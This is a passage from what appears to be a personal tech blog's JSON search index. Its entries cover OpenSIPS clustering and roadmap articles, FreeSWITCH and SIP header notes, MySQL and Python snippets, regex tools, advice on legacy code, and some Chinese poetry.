VIP1 address will be marked with the “vip1” tag and handled by the node having the “vip1” tag as active – this will be the node 1 in normal operation.The calls established via the VIP2 address will be marked with the “vip2” tag and handled by the node having the “vip2” tag as active 
– this will be the node 2 in normal operation.If the node 1 fails, the HA system will move the VIP1 as active on node 2. Further, the HA system is responsible for instructing OpenSIPS running on node 2 that it has become the owner of the “vip1” tag as well, so node 2 will start to actively handle the calls marked with “vip1” too.\n3. Anycast setup Each node has its own corresponding tag and it starts with the tag as active. So on node 1 we will have:modparam(\u0026ldquo;dialog\u0026rdquo;, \u0026ldquo;dlg_sharing_tag\u0026rdquo;, \u0026ldquo;node_1=active\u0026rdquo;)And on the second node, the same as above, but with “node_2=active”.Now, each node marks the dialogs with its own tag, for example on node 1:if (is_method(\u0026ldquo;INVITE\u0026rdquo;)) { create_dialog(); set_dlg_sharing_tag(\u0026ldquo;node_1\u0026rdquo;);}And, conversely, node 2 marks each created dialog with the “node_2” tag.If node 1 fails, the monitoring system (also responsible for the Anycast management and BGP updates) will pick one of the remaining nodes in the anycast group and it will activate the “node_1” tag on it. So, this new node will become owner of and responsible for the calls created on former node 1.\nChanging sharing tags state All that remains to be discussed is how we can take over the ownership of the dialogs flagged with a certain sharing tag at runtime. This is of course the case when our chosen mechanism of node availability detects that a node in the cluster is down, or when we do a manual switch-over (e.g. for maintenance). So for this purpose, all we have to do is to issue the MI command dlg_set_sharing_tag_active that sets a certain sharing tag to the active state. 
For example, in the single VIP scenario, with a sharing tag named “vip”, after we have re-pointed the floating IP to the current machine, we would run:opensipsctl fifo dlg_set_sharing_tag_active vip\nConclusions The new dialog clustering support in OpenSIPS 2.4 is a complete one as it not only takes care of dialog replication/sharing, but also of dialog handling in terms of properly triggering dialog-specific actions.The implementation also tries to provide a consistent solution, by following and addressing the most used scenarios in terms of dialog clustering – these are real-world scenarios answering real-world needs.Even more, the work on the dialog clustering was consistently correlated with work on the Anycast support, so it will be an easy task for the user to build an integrated anycast setup taking care of both transaction and dialog layers.Need more practical examples? Join us at the OpenSIPS Summit 2018 in Amsterdam and see the Interactive Demos about the clustering support in OpenSIPS 2.4\n","permalink":"https://wdd.js.org/opensips/blog/cluster-call/","summary":"Dialog replication in OpenSIPS has been around since version 1.10, when it became clear that sharing real-time data through a database is no longer feasible in a large VoIP platform. Further steps in this direction have been made in 2.2, with the advent of the clusterer module, which manages OpenSIPS instances and their inter-communication. But have we been able to achieve the objective of a true and complete solution for clustering dialog support?","title":"Clustering ongoing calls with OpenSIPS 2.4"},{"content":"The distributed SIP user location support is one of the major features of the latest stable OpenSIPS release, namely 2.4. 
The aim of this extension of the OpenSIPS usrloc module is to provide a horizontally scalable solution that is easy to set up and maintain, while remaining flexible enough to cope with the varying needs of each specific deployment.Throughout this text, by “data” we refer to SIP Addresses-of-Record (subscribers) and their dynamic SIP Contact bindings (network coordinates of their SIP devices) — all of these must be replicated across cluster nodes. From a data sharing point of view, we can break the distributed user location support down into two major modes of usage:\n“federation”, where each node holds a portion of the overall dataset. You can read everything about this data sharing strategy in this tutorial. “full sharing”, where all cluster nodes are homogeneous and interchangeable. In this article, we’re going to zoom in on the “full sharing” support, which is actually further broken down into two submodes of usage, depending on the size of your deployment: one where the dataset fits into OpenSIPS memory, and the other one where it is fully managed by a specialized NoSQL database.\nNative “Full Sharing” With native (OpenSIPS-only) data sharing, we make use of the clustering layer in order to replicate SIP AoRs and Contacts between nodes at runtime, as well as during the startup synchronization phase. An example setup would look like the following:\nNative “Full Sharing” ArchitectureNotice how the OpenSIPS cluster is front-ended by an additional SIP entity: a Session Border Controller. This is an essential requirement of this topology (and a common gotcha!). The idea is that the nodes, along with the way they use the data, must be identical. 
This allows, for example, the ability to ramp up/down the number of instances when the platform is running at peak hour or is sitting idle.Let’s take a look at some common platform management concerns and see how they are dealt with using the native “full sharing” topology.\nDealing with Node Failures Node failures in “full sharing” topologies are handled smoothly. Thanks to the SBC front-end that alleviates all IP restrictions, the service can withstand downtime from one or more cluster nodes without actually impacting the clients at all.\nSuccessfully completing a call through Node 2 after Node 1 goes offlineIn this diagram, cluster Node 1 goes offline due to a hardware failure. After the SIP INVITE transaction towards Node 1 times out, the SBC fails over to Node 2, successfully completing the call.\nRestart Persistency By having restart persistency, we ensure that we are able to restart a node without losing the cached dataset. There are two ways of achieving this, depending on whether you intend to use an SQL database or not.\nCluster Sync The clustering layer can also act as an initialization tool, allowing a newly booted “joiner” node to discover a consistent “donor” node from which to request a full data sync.\nSQL-based Users who prefer a more sturdy, disk-driven way of persisting data can easily configure an SQL database URL to which an OpenSIPS node will periodically flush its cached user location dataset.Recommendation: if you plan on using this feature, we recommend deploying a local database server on each node. 
Setting up multiple nodes to flush to a shared database using the old skip_replicated_db_ops feature may still work, but we no longer encourage or test such setups.\nContact Pinging Thanks to the clustering layer that makes nodes aware of the total number of online nodes, we are able to evenly spread the pinging workload across the current number of online cluster nodes at any given point in time.Configuration: You only have to configure the pinging-related module parameters of nathelper(e.g. sipping_bflag, sipping_from, natping_tcp, natping_interval) and set these flags for the contacts which require pinging. Nothing new, in short. The newly added pinging workload distribution logic will work right out of the box.\n“Full Sharing” via NoSQL NoSQL-based “Full Sharing”For deployments that are so large that the dataset outgrows the size of the OpenSIPS cache, or in case you simply don’t feel at ease with Gigabytes worth of cached SIP contacts in production, NoSQL may be a more pleasant alternative.With features such as data replication, data sharding and indexed columns, it may be a wise choice to leave the handling of large amounts of data to a specialized engine rather than doing it in-house. Configuring such setups will be a topic for an in-depth future tutorial, where we will learn how to configure “full sharing” user location clusters with both of the currently supported NoSQL engines: Apache Cassandra and MongoDB.\nSummary The “full sharing” data distribution strategy for the OpenSIPS user location is an intuitive solution which requires little to no additional OpenSIPS scripting (only a handful of module parameters). The major hurdles of running a SIP deployment (data redundancy, node failover, restart persistency and NAT traversal) have been carefully solved and baked into the module, without imposing any special script handling to the user. 
Moreover, depending on the sizing requirements of the target platform, users retain the flexibility of choosing between the native or NoSQL-based data management engines.\n","permalink":"https://wdd.js.org/opensips/blog/cluster-location/","summary":"The distributed SIP user location support is one of the major features of the latest stable OpenSIPS release, namely 2.4. The aim of this extension of the OpenSIPS usrloc module is to provide a horizontally scalable solution that is easy to set up and maintain, while remaining flexible enough to cope with varying needs of each specific deployment.\nThroughout this text, by “data” we refer to SIP Addresses-of-Record (subscribers) and their dynamic SIP Contact bindings (network coordinates of their SIP devices) — all of these must be replicated across cluster nodes.","title":"Clustered SIP User Location: The Full Sharing Topology"},{"content":"You already know the story – one more year, one more evolution cycle, one more OpenSIPS major release. Even more, a new OpenSIPS direction is about to start. So let me introduce you to the upcoming OpenSIPS 3.0.\nFor the upcoming OpenSIPS 3.0 release (and 3.x family) the main focus is on the devops concept. Shortly said, this translates into:\nmaking the OpenSIPS script writing/developing much easier simplifying the operational activities around OpenSIPS What features and functionalities a software is able to deliver is a very important factor. Nevertheless, how easy to use and operate the software is, it's another factor with almost the same importance. 
Especially if we consider the case of OpenSIPS, which is a very complex piece of software to configure, to integrate and to operate in large scale multi-party platforms.\nThe “dev” aspects in OpenSIPS 3.0 This release is looking to improve the experience of the OpenSIPS script writer (developer), by enhancing and simplifying the OpenSIPS script, at all its levels.\nThe script re-formatting (as structure), the addition of full pre-processor support, the enhancement of the script variable’s naming and support, the standardization of the complex modparams (and many others) will address the script writers’ needs of\neasiness flexibility strength when it comes to creating, managing and maintaining more and more complex OpenSIPS configurations.\nThe full list of “dev” oriented features along with explanations and details is to be found on the official 3.0 planning document.\nThe “ops” aspects in OpenSIPS 3.0 The operational activity is a continuous job, starting from day one, when you started to run your OpenSIPS. Usually there is a lot of time, effort and resources invested in these operational activities, so any extra help in the area is more than welcome.\nOpenSIPS 3.0 is planning several enhancements and new concepts in order to help with operating OpenSIPS – making it simpler to run, to monitor, to troubleshoot and diagnose.\nWe are especially looking at reducing the need for restarts during service time – restarting your production OpenSIPS is something that any devops engineer will try to avoid as much as possible. New features such as auto-scaling (as number of processes), runtime changes of module parameters or script reload are addressing this fear. 
Even when a restart cannot be avoided, the internal memory persistence during restart may minimize the impact.\nBut when it comes to vital operational activities like monitoring and understanding what is going on with your OpenSIPS or troubleshooting calls or traffic handled by your OpenSIPS, the most important new additions for helping to operate OpenSIPS are:\ntracing console – provided by the new ‘opensipsctl’ tool, the console will allow you to see in realtime various information related to specific calls only. The information may be the OpenSIPS logs, SIP packets, script logs, rest queries, maybe DB queries\nself diagnosis tool – also provided by the opensipsctl tool, this is a logic that collects various information from a running OpenSIPS (via MI) in regards to thresholds, load information, statistics and logs in order to locate and indicate a potential problem or bottleneck with your OpenSIPS. There are even more features that will simplify the way you operate your OpenSIPS – the full list (with explanations) is available on the official 3.0 planning document.\nMore Integration aspects with OpenSIPS 3.0 The work to make possible the integration of OpenSIPS with other external components is a never-ending job. This release will make no exception and address this need.\nA major rework of the Management Interface is ongoing, with the sole purpose of standardizing and simplifying the way you interact with the MI interface. Shifting to JSON encoding as the only way to pack data and re-structuring all the available transports (protocols) for interacting with the MI interface will enhance your experience in using this interface from any other language / application.\nThe 3.0 release is planning to provide new modules for more integration capabilities:\nSMPP module – a bidirectional gateway / translator between SIP (MESSAGE requests) and the SMPP protocol. RabbitMQ consumer module – a RabbitMQ consumer that pushes the messages as events into the OpenSIPS script. 
A more detailed description is available on the official 3.0 planning document.\nCommunity opinion is important The opinion of the community matters to us, so we need your feedback and comments in regards to the 3.0 Dev Plan.\nTo express yourself on the 3.0 Dev Plan, please see the online form — you can give scores to the items in the plan and you can suggest other items. This feedback will be very useful for us in order to align the Dev Plan to the real needs of our community, of the people actually using OpenSIPS. Besides our ideas listed in the form, you can of course come up with your own ideas, or feature requests that we will gladly take into consideration.\nThe deadline for submitting your answers in the form is 6th of January 2019. After this deadline we will gather all your submissions and sort them according to your feedback. We will use the result to filter the topics you consider interesting and prioritize the most wanted ones.\nAlso, to talk in more detail about the features of this new release, a public audio conference will be available on 20th of December 2018, 4 pm GMT, thanks to the kind sponsorship of UberConference. Anyone is welcome to join to find out more details or to ask questions about OpenSIPS 3.0.\nThis is a public and open conference, so no registration is needed.\nThe timeline The timeline for OpenSIPS 3.0 is:\nBeta Release – 18-31 March 2019 Stable Release – 22-29 April 2019 General Availability – 30th of April 2019, during OpenSIPS Summit 2019 ","permalink":"https://wdd.js.org/opensips/blog/opensips3x/","summary":"You already know the story – one more year, one more evolution cycle, one more OpenSIPS major release. Even more, a new OpenSIPS direction is about to start. So let me introduce you to the upcoming OpenSIPS 3.0.\nFor the upcoming OpenSIPS 3.0 release (and 3.x family) the main focus is on the devops concept. 
Shortly said, this translates into:\nmaking the OpenSIPS script writing/developing much easier simplifying the operational activities around OpenSIPS What features and functionalities a software is able to deliver is a very important factor.","title":"Introducing OpenSIPS 3.0"},{"content":"问题分为两种,一种是搜索引擎能够找到答案的,另一种是搜索引擎找不到答案的。\n按照80-20原则,前者估计能占到80%,而后者能占到20%。\n1 搜索引擎的使用 1.1 如何让搜索引擎更加理解你? 如果你能理解搜索引擎,那么搜索引擎会更加理解你。\n搜索引擎是基于关键词去搜索的,所以尽量给搜索引擎关键词,而不是大段的报错 关键词的顺序很重要,把重要的关键词放在靠前的位置 1.2 如何提炼关键词? 1.3 不错的搜索引擎推荐? 2 当搜索引擎无法解决时? 当搜索引擎无法解决时,可以从哪些方面思考?\n拼写或者格式等错误 上下文不理解,语境不清晰,断章取义 ","permalink":"https://wdd.js.org/posts/2019/07/bq7ih4/","summary":"问题分为两种,一种是搜索引擎能够找到答案的,另一种是搜索引擎找不到答案的。\n按照80-20原则,前者估计能占到80%,而后者能占到20%。\n1 搜索引擎的使用 1.1 如何让搜索引擎更加理解你? 如果你能理解搜索引擎,那么搜索引擎会更加理解你。\n搜索引擎是基于关键词去搜索的,所以尽量给搜索引擎关键词,而不是大段的报错 关键词的顺序很重要,把重要的关键词放在靠前的位置 1.2 如何提炼关键词? 1.3 不错的搜索引擎推荐? 2 当搜索引擎无法解决时? 当搜索引擎无法解决时,可以从哪些方面思考?\n拼写或者格式等错误 上下文不理解,语境不清晰,断章取义 ","title":"解决问题的思维模式"},{"content":"梦与诗 胡适 醉过才知酒浓爱过才知情重你不能做我的诗正如我不能做你的梦\n情歌 刘半农天上飘着些微云地上吹着些微风啊!微风吹动了我的头发教我如何不想她?\n沙扬娜拉 赠日本女郎 徐志摩最是那一低头的温柔像一朵水莲花不胜凉风的娇羞道一声珍重道一声珍重那一声珍重里有蜜甜的忧愁沙扬娜拉!\n再别康桥 徐志摩轻轻地我走了正如我轻轻地来我轻轻地招手作别西天的云彩\n伊眼底 汪静之伊眼底是温暖的太阳不然,何以伊一望着我我受了冻的心就热了呢\n","permalink":"https://wdd.js.org/posts/2019/07/icwy4b/","summary":"梦与诗 胡适 醉过才知酒浓爱过才知情重你不能做我的诗正如我不能做你的梦\n情歌 刘半农天上飘着些微云地上吹着些微风啊!微风吹动了我的头发教我如何不想她?\n沙扬娜拉 赠日本女郎 徐志摩最是那一低头的温柔像一朵水莲花不胜凉风的娇羞道一声珍重道一声珍重那一声珍重里有蜜甜的忧愁沙扬娜拉!\n再别康桥 徐志摩轻轻地我走了正如我轻轻地来我轻轻地招手作别西天的云彩\n伊眼底 汪静之伊眼底是温暖的太阳不然,何以伊一望着我我受了冻的心就热了呢","title":"现代诗 五首 摘抄"},{"content":"Docker ghost 安装 docker run -d --name myghost -p 8090:2368 -e url=http://172.16.200.228:8090/ \\ -v /root/volumes/ghost:/var/lib/ghost/content ghost 模板修改 参考 
https://www.ghostforbeginners.com/move-featured-posts-to-the-top-of-your-blog/ ","title":"ghost博客 固定feature博客"},{"content":"在所有的fifo命令中,which命令比较重要,因为它可以列出所有的其他命令。\n有些mi命令是存在于各个模块之中,所以加载的模块不同。opensipsctl fifo which输出的命令也不同。\n获取执行参数 opensipsctl fifo arg 列出TCP连接数量 opensipsctl fifo list_tcp_conns 查看进程信息 opensipsctl fifo ps 查看opensips运行时长 opensipsctl fifo uptime 查看所有支持的指令 opensipsctl fifo which 获取统计数据 opensipsctl fifo get_statistics rcv_requests 重置统计数据 opensipsctl fifo get_statistics received_replies get_statistics reset_statistics uptime version pwd arg which ps kill debug cache_store cache_fetch cache_remove event_subscribe events_list subscribers_list list_tcp_conns help list_blacklists regex_reload t_uac_dlg t_uac_cancel t_hash t_reply ul_rm ul_rm_contact ul_dump ul_flush ul_add ul_show_contact ul_sync domain_reload domain_dump dlg_list dlg_list_ctx dlg_end_dlg dlg_db_sync dlg_restore_db profile_get_size profile_list_dlgs profile_get_values list_all_profiles nh_enable_ping cr_reload_routes cr_dump_routes cr_replace_host cr_deactivate_host cr_activate_host cr_add_host cr_delete_host dp_reload dp_translate address_reload address_dump subnet_dump allow_uri dr_reload dr_gw_status dr_carrier_status lb_reload lb_resize lb_list lb_status httpd_list_root_path sip_trace rtpengine_enable rtpengine_show rtpengine_reload teardown ","permalink":"https://wdd.js.org/opensips/ch3/core-mi/","summary":"在所有的fifo命令中,which命令比较重要,因为它可以列出所有的其他命令。\n有些mi命令是存在于各个模块之中,所以加载的模块不同。opensipsctl fifo which输出的命令也不同。\n获取执行参数 opensipsctl fifo arg 列出TCP连接数量 opensipsctl fifo list_tcp_conns 查看进程信息 opensipsctl fifo ps 查看opensips运行时长 opensipsctl fifo uptime 查看所有支持的指令 opensipsctl fifo which 获取统计数据 opensipsctl fifo get_statistics rcv_requests 重置统计数据 opensipsctl fifo get_statistics received_replies get_statistics reset_statistics uptime version pwd arg which ps kill debug cache_store cache_fetch cache_remove event_subscribe events_list subscribers_list list_tcp_conns help list_blacklists regex_reload 
t_uac_dlg t_uac_cancel t_hash t_reply ul_rm ul_rm_contact ul_dump ul_flush ul_add ul_show_contact ul_sync domain_reload domain_dump dlg_list dlg_list_ctx dlg_end_dlg dlg_db_sync dlg_restore_db profile_get_size profile_list_dlgs profile_get_values list_all_profiles nh_enable_ping cr_reload_routes cr_dump_routes cr_replace_host cr_deactivate_host cr_activate_host cr_add_host cr_delete_host dp_reload dp_translate address_reload address_dump subnet_dump allow_uri dr_reload dr_gw_status dr_carrier_status lb_reload lb_resize lb_list lb_status httpd_list_root_path sip_trace rtpengine_enable rtpengine_show rtpengine_reload teardown ","title":"核心MI命令"},{"content":"表复制 # 不跨数据库 insert into subscriber_copy(id, username) select id, username from subscriber # 跨数据库 需要在表名前加上数据库名 insert into wdd.test(id, username) select id, username from opensips.subscriber 调整表结构 增加字段 ALTER TABLE test ADD `username` char(64) not null default \u0026#39;\u0026#39; 随机选择一个数据 SELECT name FROM table_name order by rand() limit 1\n","permalink":"https://wdd.js.org/posts/2019/07/bk7r40/","summary":"表复制 # 不跨数据库 insert into subscriber_copy(id, username) select id, username from subscriber # 跨数据库 需要在表名前加上数据库名 insert into wdd.test(id, username) select id, username from opensips.subscriber 调整表结构 增加字段 ALTER TABLE test ADD `username` char(64) not null default \u0026#39;\u0026#39; 随机选择一个数据 SELECT name FROM table_name order by rand() limit 1","title":"MySql学习"},{"content":"\n自定义SIP消息头如何从通道变量中获取? if you pass a header variable called type from the proxy server, it will get displayed as variable_sip_h_type in FreeSWITCH™. To access that variable, you should strip off the variable_, and just do ${sip_h_type}\n","permalink":"https://wdd.js.org/freeswitch/get-sip-header/","summary":"自定义SIP消息头如何从通道变量中获取? if you pass a header variable called type from the proxy server, it will get displayed as variable_sip_h_type in FreeSWITCH™. 
To access that variable, you should strip off the variable_, and just do ${sip_h_type}","title":"通道变量与SIP 消息头"},{"content":"【少年】慈母手中线,游子身上衣【毕业】浔阳江头夜送客,枫叶荻花秋瑟瑟【实习】千呼万唤始出来,犹抱琵琶半遮面【工作加班】衣带渐宽终不悔,为伊消得人憔悴【同学结婚】昔别君未婚,儿女忽成行【表白】欲得周郎顾,时时误拂弦【恋爱】在天愿作比翼鸟,在地愿为连理枝【分手】别有幽愁暗恨生,此时无声胜有声【春节回家】近乡情更怯,不敢问来人【车站遇友】马上相逢无纸笔,凭君传语报平安【外婆去世】洛阳亲友如相问,一片冰心在玉壶【节后会沪】两岸猿声啼不住,动车已过万重山【情人节】天阶夜色凉如水,坐看牵牛织女星【重游南京】浮云一别后,流水十年间【秦淮灯会】云想衣裳花想容,春风拂槛露华浓\n","permalink":"https://wdd.js.org/posts/2019/07/fabbky/","summary":"【少年】慈母手中线,游子身上衣【毕业】浔阳江头夜送客,枫叶荻花秋瑟瑟【实习】千呼万唤始出来,犹抱琵琶半遮面【工作加班】衣带渐宽终不悔,为伊消得人憔悴【同学结婚】昔别君未婚,儿女忽成行【表白】欲得周郎顾,时时误拂弦【恋爱】在天愿作比翼鸟,在地愿为连理枝【分手】别有幽愁暗恨生,此时无声胜有声【春节回家】近乡情更怯,不敢问来人【车站遇友】马上相逢无纸笔,凭君传语报平安【外婆去世】洛阳亲友如相问,一片冰心在玉壶【节后会沪】两岸猿声啼不住,动车已过万重山【情人节】天阶夜色凉如水,坐看牵牛织女星【重游南京】浮云一别后,流水十年间【秦淮灯会】云想衣裳花想容,春风拂槛露华浓","title":"无题 再读唐诗宋词"},{"content":"汤婆婆给千寻签订了契约,之后千寻的名字被抹去了,每个人都叫千寻小千,甚至千寻自己,也忘记了自己原来的名字。\n但是只有白先生告诫千寻,一定要记住自己的名字,否则再也无法回到原来的世界。而白先生自己,就是那个已经无法回到原来世界的人。\n最重要的是记住自己的名字 名字要有意义 不要使用缩写,缩写会让你忘记自己的原来的名字 没有工作的人,会变成妖怪的 没有用的变量,会变成垃圾 别吃得太胖,会被杀掉的 别占用太多内存,会被操作系统给杀掉的 ","permalink":"https://wdd.js.org/posts/2019/07/gzfn7t/","summary":"汤婆婆给千寻签订了契约,之后千寻的名字被抹去了,每个人都叫千寻小千,甚至千寻自己,也忘记了自己原来的名字。\n但是只有白先生告诫千寻,一定要记住自己的名字,否则再也无法回到原来的世界。而白先生自己,就是那个已经无法回到原来世界的人。\n最重要的是记住自己的名字 名字要有意义 不要使用缩写,缩写会让你忘记自己的原来的名字 没有工作的人,会变成妖怪的 没有用的变量,会变成垃圾 别吃得太胖,会被杀掉的 别占用太多内存,会被操作系统给杀掉的 ","title":"从千与千寻谈编程风格"},{"content":"Photo by Blair Fraser on Unsplash\n从头开发一个软件只是小儿科,改进一个程序才显真本事。《若为自由故 自由软件之父理查德·斯托曼传》\n每个人都有从零开发软件的处女情结,但是事实上我们大多数时候都在维护别人的代码。\n所以,别人写的代码如何糟糕,你再抱怨也是无意义的。\n从内心中问自己,你究竟是在抱怨别人,还是不敢面对自己脆弱的内心。\n老代码的意义 廉颇老矣,尚能饭否。\n老代码的有很多缺点,如难以维护,逻辑混乱。但是老代码有唯一的好处,就是老代码经过生产环境的洗礼。这至少能证明老代码能够稳定运行,不出问题。\n东西,如果不出问题,就不要动它。\n老代码可能存在哪些问题 老代码的问题,就是我们重构的点。首先我们要明确,老代码中有哪些问题。\n模块性不强,重复代码太多 逻辑混乱,业务逻辑和框架逻辑混杂 注释混乱:特别要小心,很多老代码中的注释都可能不知道祖传多少代了。如果你要按着注释去理解,很可能南辕北辙,走火入魔。按照代码的执行去理解业务逻辑,而不是按照注释。 配置性的硬代码和业务逻辑混杂,这个是需要在后期抽离的 如果你无法理解,请勿重构 带着respect, 也带着质疑,阅读并理解老代码。取其精华,去其糟粕。如果你还不理解老代码,就别急着重构它,让子弹飞一会。\n等自己能够理解老代码时,再去重构。我相信在理解基础上重构,会更快,也更安全。\n不要大段改写,要见缝插针 
不要在老代码中直接写自己的代码,应该使用函数。\n在老代码中改动一行,调用自己写的函数。\n几乎每种语言中都有函数这种组织代码的形式,通过见缝插针调用函数的方式。能够尽量减少老代码的改动,如果出现问题,也比较容易调试。\n","permalink":"https://wdd.js.org/posts/2019/07/osb460/","summary":"Photo by Blair Fraser on Unsplash\n从头开发一个软件只是小儿科,改进一个程序才显真本事。《若为自由故 自由软件之父理查德·斯托曼传》\n每个人都有从零开发软件的处女情结,但是事实上我们大多数时候都在维护别人的代码。\n所以,别人写的代码如何糟糕,你再抱怨也是无意义的。\n从内心中问自己,你究竟是在抱怨别人,还是不敢面对自己脆弱的内心。\n老代码的意义 廉颇老矣,尚能饭否。\n老代码的有很多缺点,如难以维护,逻辑混乱。但是老代码有唯一的好处,就是老代码经过生产环境的洗礼。这至少能证明老代码能够稳定运行,不出问题。\n东西,如果不出问题,就不要动它。\n老代码可能存在哪些问题 老代码的问题,就是我们重构的点。首先我们要明确,老代码中有哪些问题。\n模块性不强,重复代码太多 逻辑混乱,业务逻辑和框架逻辑混杂 注释混乱:特别要小心,很多老代码中的注释都可能不知道祖传多少代了。如果你要按着注释去理解,很可能南辕北辙,走火入魔。按照代码的执行去理解业务逻辑,而不是按照注释。 配置性的硬代码和业务逻辑混杂,这个是需要在后期抽离的 如果你无法理解,请勿重构 带着respect, 也带着质疑,阅读并理解老代码。取其精华,去其糟粕。如果你还不理解老代码,就别急着重构它,让子弹飞一会。\n等自己能够理解老代码时,再去重构。我相信在理解基础上重构,会更快,也更安全。\n不要大段改写,要见缝插针 不要在老代码中直接写自己的代码,应该使用函数。\n在老代码中改动一行,调用自己写的函数。\n几乎每种语言中都有函数这种组织代码的形式,通过见缝插针调用函数的方式。能够尽量减少老代码的改动,如果出现问题,也比较容易调试。","title":"如何维护老代码?"},{"content":"regex101: 功能最强 https://regex101.com/\nregex101的功能最强,支持php, js, python, 和go的正则表达式\nRegulex:正则可视化 https://jex.im/regulex/#!flags=\u0026amp;re=%5E(a%7Cb)*%3F%24\nregulex仅支持js的正则,\nregexper:正则可视化 https://regexper.com/\npyregex:专注python正则 http://www.pyregex.com/\n","permalink":"https://wdd.js.org/fe/regex-tools/","summary":"regex101: 功能最强 https://regex101.com/\nregex101的功能最强,支持php, js, python, 和go的正则表达式\nRegulex:正则可视化 https://jex.im/regulex/#!flags=\u0026amp;re=%5E(a%7Cb)*%3F%24\nregulex仅支持js的正则,\nregexper:正则可视化 https://regexper.com/\npyregex:专注python正则 http://www.pyregex.com/","title":"Regex Tools"},{"content":"基于python # 基于python2 python -m SimpleHTTPServer 8088 # 基于python3 python -m http.server 8088 基于Node.js https://github.com/zeit/serve https://github.com/http-party/http-server ","permalink":"https://wdd.js.org/posts/2019/07/stxzl6/","summary":"基于python # 基于python2 python -m SimpleHTTPServer 8088 # 基于python3 python -m http.server 8088 基于Node.js https://github.com/zeit/serve https://github.com/http-party/http-server 
","title":"1秒搭建静态文件服务器"},{"content":"上传文件 import requests headers = { \u0026#34;ssid\u0026#34;:\u0026#34;1234\u0026#34; } files = {\u0026#39;file\u0026#39;: open(\u0026#39;yourfile.tar.gz\u0026#39;, \u0026#39;rb\u0026#39;)} url=\u0026#34;http://localhost:1345/fileUpload/\u0026#34; r = requests.post(url, files=files, headers=headers) print(r.status_code) ","permalink":"https://wdd.js.org/posts/2019/07/ya30bi/","summary":"上传文件 import requests headers = { \u0026#34;ssid\u0026#34;:\u0026#34;1234\u0026#34; } files = {\u0026#39;file\u0026#39;: open(\u0026#39;yourfile.tar.gz\u0026#39;, \u0026#39;rb\u0026#39;)} url=\u0026#34;http://localhost:1345/fileUpload/\u0026#34; r = requests.post(url, files=files, headers=headers) print(r.status_code) ","title":"python request 库学习"},{"content":"fs日志级别\n0 \u0026#34;CONSOLE\u0026#34;, 1 \u0026#34;ALERT\u0026#34;, 2 \u0026#34;CRIT\u0026#34;, 3 \u0026#34;ERR\u0026#34;, 4 \u0026#34;WARNING\u0026#34;, 5 \u0026#34;NOTICE\u0026#34;, 6 \u0026#34;INFO\u0026#34;, 7 \u0026#34;DEBUG\u0026#34; 日志级别设置的越高,显示的日志越多\n在autoload_configs/switch.conf.xml 设置了一些快捷键,可以在fs_cli中使用\nF7将日志级别设置为0,显示的日志最少 F8将日志级别设置为7, 显示日志最多 同时也可以使用 console loglevel指令自定义设置级别\nconsole loglevel 1 console loglevel notice 参考 https://freeswitch.org/confluence/display/FREESWITCH/Troubleshooting+Debugging ","permalink":"https://wdd.js.org/freeswitch/fs-log-level/","summary":"fs日志级别\n0 \u0026#34;CONSOLE\u0026#34;, 1 \u0026#34;ALERT\u0026#34;, 2 \u0026#34;CRIT\u0026#34;, 3 \u0026#34;ERR\u0026#34;, 4 \u0026#34;WARNING\u0026#34;, 5 \u0026#34;NOTICE\u0026#34;, 6 \u0026#34;INFO\u0026#34;, 7 \u0026#34;DEBUG\u0026#34; 日志级别设置的越高,显示的日志越多\n在autoload_configs/switch.conf.xml 设置了一些快捷键,可以在fs_cli中使用\nF7将日志级别设置为0,显示的日志最少 F8将日志级别设置为7, 显示日志最多 同时也可以使用 console loglevel指令自定义设置级别\nconsole loglevel 1 console loglevel notice 参考 https://freeswitch.org/confluence/display/FREESWITCH/Troubleshooting+Debugging ","title":"fs日志级别"},{"content":" from字段用来标记请求的发起者ID to字段用来标记请求接受者的ID to字段并不能用于路由,request-url可以用来路由 
一般情况下,sip消息在传输过程中,from和to字段都不会改,而request-url很可能会因为路由而改变 对于最初的请求,除了注册请求之外,request-url和to字段中的url一致 from字段:The From header field is a required header field that indicates the originator of the request. It is one of two addresses used to identify the dialog. The From header field contains a URI, but it may not contain the transport, maddr, or ttl URI parameters. A From header field may contain a tag used to identify a particular call. A From header field may contain a display name, in which case the URI is enclosed in \u0026lt; \u0026gt;. If there is both a URI parameter and a tag, then the URI including any parameters must be enclosed in \u0026lt; \u0026gt;. Examples are shown in Table 6.8. A From tag was optional in RFC 2543 but is mandatory to include in RFC 3261.\nto字段:The To header field is a required header field in every SIP message used to indicate the recipient of the request. Any responses generated by a UA will contain this header field with the addition of a tag. (Note that an RFC 2543 client will typically only generate a tag if more than one Via header field is present in the request.) Any response generated by a proxy must have a tag added to the To header field. A tag added to the header field in a 200 OK response is used throughout the call and incorporated into the dialog. The To header field URI is never used for routing—the Request-URI is used for this purpose. An optional display name can be present in the header field, in which case the SIP URI is enclosed in \u0026lt; \u0026gt;. If the URI contains any parameters or username parameters, the URI must be enclosed in \u0026lt; \u0026gt; even if no display name is present. The compact form of the header field is t. 
Examples are shown in Table 6.12.\n上面的信令图属于一个dialog, 并且包含三个事务\ninvite 到 200 ok属于一个事务 ack是单独的一个事务 bye和200 ok属于一个事务 在同一个事务中,from和to中的sip url和tag都是相同的,但是对于不同的事务,from和to头的url和tag会相反。\n# 事务1: INVITE 180 200 From: \u0026lt;sip:a@test.com\u0026gt;;tag=aaa To: \u0026lt;sip:b@test.com\u0026gt;;tag=bbb # 事务2: ACK From: \u0026lt;sip:a@test.com\u0026gt;;tag=aaa To: \u0026lt;sip:b@test.com\u0026gt;;tag=bbb # 事务3: BYE 200 ok # 由于事务3的发起方是B, 所以 From: \u0026lt;sip:b@test.com\u0026gt;;tag=bbb To: \u0026lt;sip:a@test.com\u0026gt;;tag=aaa 所以在处理OpenSIPS脚本的时候,特别是关于from_tag和to_tag的处理的时候,我们不能先入为主的认为初始化和序列化的的所有请求里from_tag和to_tag都是不变的。 也不能先入为主的认为from_url和 to_url是一成不变的。\n所以我们就必须深入的认识到,from和to实际上是标志着这个事务的方向。而不是dialog的方向。\n【重点】初始化请求和序列化请求\nrfc 3261 request url The initial Request-URI of the message SHOULD be set to the value of the URI in the To field. One notable exception is the REGISTER method; behavior for setting the Request-URI of REGISTER is given in Section 10. It may also be undesirable for privacy reasons or convenience to set these fields to the same value (especially if the originating UA expects that the Request-URI will be changed during transit). In some special circumstances, the presence of a pre-existing route set can affect the Request-URI of the message. A pre-existing route set is an ordered set of URIs that identify a chain of servers, to which a UAC will send outgoing requests that are outside of a dialog. Commonly, they are configured on the UA by a user or service provider manually, or through some other non-SIP mechanism. When a provider wishes to configure a UA with an outbound proxy, it is RECOMMENDED that this be done by providing it with a pre-existing route set with a single URI, that of the outbound proxy. 
